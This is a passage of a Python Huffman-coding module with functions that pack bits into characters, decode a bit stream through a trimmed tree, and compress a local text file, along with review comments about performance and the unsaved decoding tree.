    bit length is appended to the result as a decimal digit; this lets
    text_to_bits recover the exact original bit stream.
    """
    chunks = [''.join(bits[pos:pos + CHAR_LEN])
              for pos in range(0, len(bits), CHAR_LEN)]
    tail_bits = len(chunks[-1])
    chars = [chr(int(chunk, 2)) for chunk in chunks]
    chars.append(str(tail_bits))
    return ''.join(chars)
def text_to_bits(text):
    """Inverse of bits_to_text: unpack characters back into a bit list.

    The last character of *text* is the decimal bit-length of the final
    packed chunk; only that many low bits of the chunk are real data.
    """
    chars = list(text)
    tail_bits = int(chars.pop())
    tail_char = chars.pop()
    pieces = [bin(ord(ch))[2:].zfill(CHAR_LEN) for ch in chars]
    pieces.append(bin(ord(tail_char))[2:].zfill(CHAR_LEN)[-tail_bits:])
    return list(''.join(pieces))
def decode_bits(bits, tree):
    """Walk *tree* bit by bit and collect the character at each leaf.

    args:
        bits: iterable of '0'/'1' characters
        tree: trimmed Huffman tree from cut_tree (leaves are str)
    returns:
        the decoded text

    Decoded characters are gathered in a list and joined once at the
    end; the previous ``decompressed += node`` rebuilt the string for
    every decoded character, making decompression quadratic in the
    output length (the module docstring's ~9 s decompress vs ~3 s
    compress).  Also uses isinstance() rather than a ``type(...) is``
    comparison.
    """
    chars = []
    node = tree
    for bit in bits:
        node = node[int(bit)]
        if isinstance(node, str):
            chars.append(node)
            node = tree  # restart from the root for the next character
    return ''.join(chars)
def huffman_decompress(text, tree):
    """Reverse huffman_compress: unpack *text* to bits, decode via *tree*."""
    print("Converting to bits")
    stream = text_to_bits(text)
    print("Decoding bits")
    return decode_bits(stream, tree)
def huffman_compress(text):
    """Huffman-encode *text*.

    returns:
        (compressed, trimmed_tree): the packed string and the
        weight-free tree needed to decompress it.
    """
    print("Getting text frequencies...")
    frequencies = get_freqs(text)
    print("Sorting frequencies...")
    leaf_nodes = sort_freqs(frequencies)
    print("Generating tree...")
    weighted_tree = get_tree(leaf_nodes)
    print("Cutting tree...")
    code_tree = cut_tree(weighted_tree)
    print("Calculating codes...")
    code_table = get_codes(code_tree)
    print("Encoding bits...")
    bit_stream = encode_bits(text, code_table)
    print("Converting bits to text...")
    packed = bits_to_text(bit_stream)
    return packed, code_tree
if __name__ == '__main__':
    # Read the entire input corpus as one string.
    with open('text.txt', 'rt') as text_file:
        text = text_file.read()
    print("Starting compression...")
    compressed, letter_tree = huffman_compress(text)
    print("Finished!")
    # print()
    # print("Starting decompression")
    # decompressed = huffman_decompress(compressed, letter_tree)
    # print('Finished')
    print()
    # NOTE(review): len() counts characters, not on-disk bytes, so the
    # reported ratio is only approximate for non-ASCII output.
    print(len(text), 'bytes ->', len(compressed), 'bytes')
    print("Compression Percentage: " + str(int(len(compressed) / len(text) * 100)) + "%")
    print()
    # Persist the packed text; the decoding tree is NOT saved, so
    # decompression is only possible within this process.
    with open('compressed.txt', 'wt') as compressed_file:
        compressed_file.write(str(compressed))
    # with open('decompressed.txt', 'wt') as decompressed_file:
    #     decompressed_file.write(decompressed)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.